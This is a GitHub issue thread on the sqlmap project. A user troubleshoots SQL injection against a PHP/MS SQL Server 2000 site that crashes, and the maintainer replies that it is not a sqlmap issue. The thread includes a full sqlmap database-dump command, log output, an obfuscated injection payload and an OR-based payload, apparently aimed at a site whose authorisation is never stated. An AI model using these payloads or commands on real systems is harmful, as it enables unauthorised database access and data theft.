### ISSUE TITLE
error: Allowed memory size exhausted!?

### ISSUE THREAD

**Issue by huitc** [sqlmapproject/sqlmap#2945]
if I enter 【1' or '1'='1'--】, It will give back

PHP Fatal error: Allowed memory size of 536870912 bytes exhausted (tried to allocate 19100160 bytes) in E:\Website\verify_loyalty.php on line 27

How can I fix it?...

**details:** 
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS operating system: Windows 2003 Service Pack 2
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
               banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 4 version 8.00.2039

banner:
---
Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
        May  3 2005 23:18:38
        Copyright (c) 1988-2003 Microsoft Corporation
        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

It keeps me from extracting things from the database.........:pensive:

---

_從我的 MI6，使用 [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github) 發送。_

**Comment by stamparm** [comment]
This is not a sqlmap issue. Usage of `OR` payloads is risky as it can result with this kind of results. I am not sure what do you want to fix here (from sqlmap point of view) in the first place? For starter fix the sql injection there (sanitize user input values)

**Comment by huitc** [comment]
@stamparm Is there a way to minimize the query content per request? Because this site has some limitations, it is not possible to spend too much hardware resources on a short time or the same query request. In that case, what is your opinion? Even if it takes a lot of time to do it

_從我的 MI6，使用 [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github) 發送。_

**Comment by huitc** [comment]
@stamparm sqlmap.py -u *****.*** --form --level 5 --tamper randomcase,between --random-agent -v 2 --drop-set-cookie --threads 1 --batch --delay 1 --string="You are visitor" -D Northwind --dump

[19:17:08] [INFO] fetching tables for database: Northwind
[19:17:11] [WARNING] the SQL query provided does not return any output
[19:17:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:17:11] [INFO] used SQL query returns 13 entries
[19:17:34] [DEBUG] performed 13 queries in 23.06 seconds
[19:17:34] [INFO] fetching number of tables for database 'Northwind'
[19:17:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:17:35] [INFO] retrieved:
[19:17:42] [DEBUG] performed 4 queries in 6.24 seconds
[19:17:42] [INFO] retrieved:
[19:17:47] [DEBUG] turning off reflection removal mechanism (for optimization purposes)

[19:17:48] [DEBUG] performed 4 queries in 6.42 seconds
[19:17:48] [INFO] resumed: 13
[19:17:48] [DEBUG] performed 0 queries in 0.00 seconds
[19:17:48] [INFO] retrieved:
[19:21:16] [DEBUG] performed 125 queries in 208.10 seconds
[19:21:16] [INFO] retrieved:
[19:25:00] [DEBUG] performed 125 queries in 223.34 seconds
[19:25:00] [INFO] retrieved:
[19:28:35] [DEBUG] performed 125 queries in 215.15 seconds
[19:28:35] [INFO] retrieved:
[19:32:00] [DEBUG] performed 125 queries in 205.50 seconds
[19:32:00] [INFO] retrieved:

[19:32:16] [WARNING] unable to retrieve the tables for database 'Northwind'

(I tried no-cast and hex

_從我的 MI6，使用 [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github) 發送。_

**Comment by stamparm** [comment]
If `--no-cast --no-escape` doesn't help, then you should use `-v 3` to see what payloads are being used and then try to minimize the payloads manually.

**Comment by huitc** [comment]
@stamparm payload: rXcF' And 3178 In (sELeCT (ChAr(113)+ChAr(122)+ChAr(112)+ChAr(106)+ChAr(113)+(sELeCT TOP 1 SUBSTRInG((iSnuLL(CAst(table_schema+ChAr(46)+table_name As NVARChAr(4000)),ChAr(32))),1,343) frOM information_schema.tables whEre table_catalog=ChAr(101)+ChAr(118)+ChAr(101)+ChAr(114) And iSnuLL(CAst(table_schema+ChAr(46)+table_name As NVARChAr(4000)),ChAr(32)) NoT In (sELeCT TOP 1 iSnuLL(CAst(table_schema+ChAr(46)+table_name As NVARChAr(4000)),ChAr(32)) frOM information_schema.tables whEre table_catalog BeTweEN ChAr And ChAr(101)+ChAr(118)+ChAr(101)+ChAr(114) ORDer bY table_schema+ChAr(46)+table_name) ORDer bY table_schema+ChAr(46)+table_name)+ChAr(113)+ChAr(118)+ChAr(107)+ChAr(122)+ChAr(113)))-- teGE

PHP Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'ChAr'. (severity 16) in E:\Website\verify_loyalty.php on line 27 PHP Warning: mssql_query() [function.mssql-query]: Query failed in E:\Website\verify_loyalty.php on line 27 PHP Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in E:\Website\verify_loyalty.php on line 28 PHP Warning: mssql_fetch_array(): supplied argument is not a valid MS SQL-result resource in E:\Website\verify_loyalty.php on line 29

payload: ' or '1'='1' --
PHP Fatal error: Allowed memory size of 536870912 bytes exhausted (tried to allocate 19101184 bytes) in E:\Website\verify_loyalty.php on line 27

_從我的 MI6，使用 [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github) 發送。_

**Comment by huitc** [comment]
In this case, which "technique" option is better to use

**Comment by huitc** [comment]
?

**Comment by stamparm** [comment]
Can't help you here if you are not able to debug payloads manually (e.g. with Burp). You shouldn't use `OR` payloads - this doesn't have anything to do with the technique being chosen. Also, in your case tamper script `randomcase` does some syntax problems.
